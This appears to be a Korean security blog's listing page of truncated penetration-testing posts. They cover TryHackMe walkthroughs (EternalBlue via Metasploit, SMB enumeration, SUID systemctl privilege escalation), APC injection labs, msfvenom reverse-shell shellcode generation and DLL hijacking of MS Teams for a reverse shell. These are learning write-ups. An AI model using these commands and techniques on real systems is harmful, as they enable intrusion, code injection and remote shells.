THM Offensive Pentesting - Kenobi
·
System/침투
TASK 2-3. 침투 0. port scan 1. Samba Windows의 SMB 프로토콜을 구현하여 파일 및 프린터 공유를 가능하게 함 * 대부분의 Linux 배포판에 smbclient가 설치되어 있음 1) nmap nmap -p {port: 445 or 139} --script=smb-enum-shares.nse,smb-enum-users.nse {ip} *smb-enum-shares.nse : Samba 서버에서 공유된 디렉터리(Shares)를 열거 *smb-enum-users.nse : Samba 서버에 등록된 사용자 계정 열거 2) smbclient smbclient -R smb://{ip}/{user} # -R : recursive mode, 원격 서버의 모든 디렉터리 및 하위 디렉터리를 ..
THM Offensive Pentesting - Blue
·
System/침투
Task 1 - 타겟은 ms 관련 취약점을 가지고 있음 - site:https://learn.microsoft.com/en-us/security-updates/securitybulletins/ windows7 445 - MS17-010 취약점 (링크) Task 2 msfconsole use exploit/windows/smb/ms17_010_eternalblue set rhosts set payload windows/x64/shell/reverse_tcp exploit Task 3 1) meterpreter shell 진입 - 백그라운드 전환 (ctrl + z), background sesions 1 - meterpreter shell로 진입하기 위해 shell_to_meterpreter 이용 use p..
THM Offensive Pentesting - Vulnversity
·
System/침투
Task 5. Privilege Escalation - SUID를 이용한 권한 상승 - systemctl 이용 나는 systemctl를 서비스 시작/정지 작업을 위한 유틸리티로만 알고 있었는데, 다른 기능도 있더라. systemctl 통해서 시스템 부팅 시 특정 서비스가 자동으로 시작하도록 설정할 수 있다. 마침 오늘 오전에 centOS tomcat 구축하며 알았다. 이 경험이 아니었으면 한참 더 헤맸을 듯 하다. 아무튼, 이를 이용하여 flag를 얻어보자. 1. pe.service [Unit] Description=pe to root [Service] ExecStart=/bin/bash -c 'cat /root/root.txt > flag.txt' [Install] WantedBy=multi-user...
APC injection 실습 (2)
·
System/침투
APC injection 실습 (2) 실습환경: windows 10 21H2 64bit 실습대상: notepad.exe 실습도구: visual studio 2022 17.1.1, Process Explorer v16.43​ 참고: (링크) [+] APC Injection 실습 (2) 간단정리 ​- 윈도우 프로세스의 일시 중지 된 프로세스를 합법적으로 생성 (예: svchost.exe) - 해당 프로세스(svchost.exe)에 메모리를 할당하고, 할당 받은 메모리 영역에 악성 코드를 씀 - 해당 프로세스(svchost.exe)의 메인 쓰레드에 비동기 프로시져 호출 (APC)을 대기 ▶ APC는 알람 가능한 상태(alertable state)일 때만 프로세스를 실행할 수 있기 때문에, NtTestAlert..
APC Injection 실습 (1)
·
System/침투
APC Injection 실습 (1) 실습환경: windows 10 21H2 64bit 실습대상: notepad.exe 실습도구: visual studio 2022 17.1.1, Process Explorer v16.43 참고: (링크) [+] APC Injection 간단정리 · QueueUserAPC(): 특정 스레드를 queue에 대기시키기 위해 APC 활용 · 각 스레드에는 독립적인 APC queue가 존재함. 응용 프로그램은 QueueUserAPC() 함수를 호출하여 APC를 스레드에 큐잉 · APC 큐잉 == 스레드가 APC 함수를 호출하기위한 요청 실습 (APC_injection_1.sln) ① calc.exe를 실행하는 페이로드 생성 ② 해당 페이로드를 코드에서 사용할 수 있도록 변형 (\..
3. APC(Asynchronous Procedure Call) Injection
·
System/침투
APC(Asynchronous Procedure Call) https://so106037.tistory.com/363 APC (Asynchronous procedure call) 참고 # Windows 시스템 프로그래밍 제 3판 JOHNSON M. HART 저 # Micosoft 설명서 (링크) APC (Asynchronous procedure call) 1. 개념 - 인자를 전달받아 바로 호출하는 SPC(Synchronous Procedure Calls) 함수와 달리, APC 는 so106037.tistory.com APC Injection 참고 및 출처: MITRE-ATT&CK 공격자들은 프로세스 기반 방어를 회피하고 권한을 높이기 위해 APC queue를 사용하여 악성코드를 프로세스에 인젝션할 수 ..
Metasploit msfvenom 통한 쉘코드 생성
·
System/침투
msfvenom 메타스플로잇 프레임워크에 포함되어있는 도구. exploit 실행 파일, 쉘코드 생성 가능 // payloads 관련 모듈 리스트 확인 가능 msfvenom -l payloads [example] 리버스 쉘을 위한 쉘코드 작성 (출력 형식 : c언어) msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.123.123.123 LPORT=4444 -f c format list (-f 옵션) 실행 가능한 포맷 변환 가능한 포맷 asp aspx aspx-exe axis2 dll ducky-script-psh elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi m..
DLL Hijacking 실습 (4) - 리버스 쉘
·
System/침투
DLL Hijacking 실습 (4) - 리버스 쉘 실습환경: windows 10 21H2 64bit 실습대상: microsoft team v.1.3.00.24758 실습도구: gcc, procmon, vscode 1.660, visual studio 2022 17.1.1 참고: (링크) 실습 (3)에 이어서.. MS Teams가 실행될 떄마다 reverse TCP shell이 실행되도록 할 것이다. 하이잭할 DLL은 cscapi.dll ① 악성 페이로드 생성 우선, payload에 넣어 줄 리버스 쉘 데이터가 필요하다. 메타스플로잇 프레임워크에 포함된 msfvenom을 통해 페이로드를 생성한다. (msfvenom 관련 게시글) msfvenom -p windows/x64/shell_reverse_tcp ..